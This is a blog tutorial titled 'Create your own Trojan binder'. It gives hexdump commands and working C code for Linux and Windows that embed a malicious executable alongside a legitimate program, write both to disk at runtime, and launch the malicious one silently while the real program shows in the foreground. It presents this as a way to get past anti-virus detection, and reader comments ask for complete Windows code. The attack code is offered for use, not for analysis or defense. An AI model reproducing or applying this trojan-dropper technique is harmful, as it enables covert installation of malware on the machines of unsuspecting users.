Skip to content

Create your own Trojan binder

by foip on December 15th, 2010

1. Introduction

Sometimes you would like to merge your own piece of code (Trojan, Joke, …) to a legitimate executable file, under Windows or Linux. Unfortunately, binder tools you’ve downloaded from Internet are detected by anti-virus software. Worst, they are virus. Actually, bind two files is not an exploit. With a bit of c/c++ you can easily create your own binder.

This post will explains to you how to create a valid executable file, which contains actually two executable files. We will not write a full binder from scratch, but only provide you the basic idea needed to do it by your self.


1.1. Requirements

  • We assume you know how to develop and compile C programs under Linux or Windows.
  • hexdump utility.


1.2. The steps

The idea is to dump the initial executable files as hexadecimal, into C variables. Like this:


unsigned char evil[]    = {\xaa, \xaa, \xaa, ... , \xaa };
unsigned char real_prog[] = {\xbb, \xbb, \xbb, ... , \xbb };

Next you have to write a C function that will locally recreates the files at run-time, and executes both files (in foreground or background). System calls such as open(), write(), fork() and exec() will be used for Linux, CreateProcess() and so on for Windows.


2. Lets practice

2.1. Dumping binary into C variables

In order to dump an executable file, you need hexdump utility (we will use it under Linux). Use the following syntax to try by your self:

[root@host ]$ cat evil.exe | hexdump -v -e '"0x" 1/1 "%02X" ","'
0x7F,0x45,0x4C,0x46,0x01,0x01,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB4,0x08,0x00,0x00,
0x00,....

It’s time to create the C variables. We will store them into a C header file (.h). Actually, it’s not a good practice to declare a variable inside a header file. Usually, the variable must be declared inside the “.c” file (the module). But for clarity, we will do an exception.

[root@host ]$ echo "const unsigned char evil[] = {" > hex-evil.h
[root@host ]$ cat evil.exe | hexdump -v -e '"0x" 1/1 "%02X" ","' | sed s/,$// >> hex-evil.h
[root@host ]$ echo "};" >> hex-evil.h

Do the same for the second binary.

[root@host ]$ echo "const unsigned char real_prog[] = {" > hex-real-prog.h
[root@host ]$ cat real-prog.exe | hexdump -v -e '"0x" 1/1 "%02X" ","' | sed s/,$// >> hex-real-prog.h
[root@host ]$ echo "};" >> hex-real-prog.h


2.2. Re-create binary files at runtime, and execute them

Recreating the files is only a matter of writing back the variable content into a recently created file.

For Linux: Create a C function like this:


#include "hex-evil.h"
#include "hex-real-prog.h"

int recreate_binary() {
     FILE *file;

     // evilcode
     file = fopen("evil.bin", "w");
     if(file){
          fwrite(evil, 1, sizeof(evil), file);
          fclose(file);
          chmod("evil.bin",0755);
     }else
         return 1;

     // realprog
     file = fopen("realprog.bin", "w");
     if(file){
          fwrite(real_prog, 1, sizeof(real_prog), file);
          fclose(file);
          chmod("realprog.bin",0755);
     }else
         return 1;

     return 0;
}

int execute_binary(){
     signal(SIGCHLD, SIG_IGN);  // avoid zombie, don't need exit info from child
     int pidMt;
     if((pidMt=fork())==0){
           execl("evil.bin", "evil.bin", (char *) 0);
           perror("exec failed");
           exit(0); // Failed
     }

     if((pidMt=fork())==0){
           execl("realprog.bin", "realprog.bin", (char *) 0);
           perror("exec failed");
           exit(0); // Failed
     }

     return 0;
}

For Windows: this is an equivalent


// Create and run "evil code" (silently)

file = CreateFile(evil_filename, GENERIC_WRITE,
                      FILE_SHARE_WRITE, 0,
                      CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,0);
WriteFile(file, evil_data, evil_len, &written,0);
CloseHandle(file);
//Run it (silently)
ShellExecute(0, "open", evil_filename ,NULL, NULL, SW_HIDE);

// Create and run "legitimate prog" (foreground)
file = CreateFile(calculator_filename, GENERIC_WRITE,
                      FILE_SHARE_WRITE,  0,
                      CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
WriteFile(file,calculator_data, calculator_len, &written,0);
CloseHandle(file);
ShellExecute(0, "open", calculator_filename ,NULL, NULL, SW_SHOWDEFAULT);


3. The end

It’s time to put everything together. Hope you enjoy.



1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 5.00 out of 5)

Loading...

© 2010 – 2014, Fun Over IP. All rights reserved.

From → Backdoor, Hacking

3 Comments
  1. Manthan permalink

    Sir, thanks for the wonderful guide. The linux code is working perfectly fine. Facing problem in windows code. Please tell me complete code for windows

  2. Abhishek permalink

    in windows it shows error that cannot run in 64 bit windows

    • foip permalink

      You must first learn how to develop and compile code under Windows, then try again ..

Comments are closed.

© 2010-2019 Fun Over IP All Rights Reserved -- Copyright notice by Blog Copyright